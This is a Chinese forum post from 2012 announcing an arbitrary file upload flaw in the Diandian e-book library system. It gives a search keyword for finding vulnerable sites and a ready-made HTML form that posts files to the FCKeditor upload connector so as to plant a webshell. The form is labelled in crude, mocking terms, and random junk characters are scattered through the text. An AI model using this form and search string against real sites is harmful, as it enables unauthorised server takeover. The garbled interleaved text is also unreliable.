主题:图书馆系统任意文件上传漏洞( c3 @6 a. _0 ~
作者:冰锋刺客
& y! n9 Q( ^; ^# I k) H# ` 厂商:点击书(dianjishu.com)* J/ p! K1 D. X& h1 Q" P
日期:2012-6-21
! Y4 |4 \7 b' X+ } - T- g9 [; [* Q+ |
I 概述
$ Z5 h3 ^1 B% @) b, U 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
5 ?! i* F8 K2 y2 O- R2 |0 g8 ^ II 简介% U4 w0 `9 k& g* s4 a |; L- o
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
3 Y: I1 z7 Q1 @ 补充一个漏洞
" c2 `5 o f6 \ <form id="frmUpload" enctype="multipart/form-data"
A2 Y$ Q: A+ f" B action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>, r6 g5 r |# ?/ B. ]0 Y, U
<input id="btnUpload" type="submit" value="操翻他">
4 Z, X9 R, o1 \( C </form>
& ~6 P. |0 X* U! V% o 你们懂的* _* A# c" c" G) I# d/ O1 a; {7 M& U
那傻逼提供还需要改包.
, ~3 s$ K+ [% M) q) w: T9 o 自己看了下源代码发现fckeditor
* z p: |5 U7 \2 X1 `( U- i 直接秒杀% c: ?- ^+ H; S% _
|
发表于 2012-9-10 21:20:59
收藏
支持
反对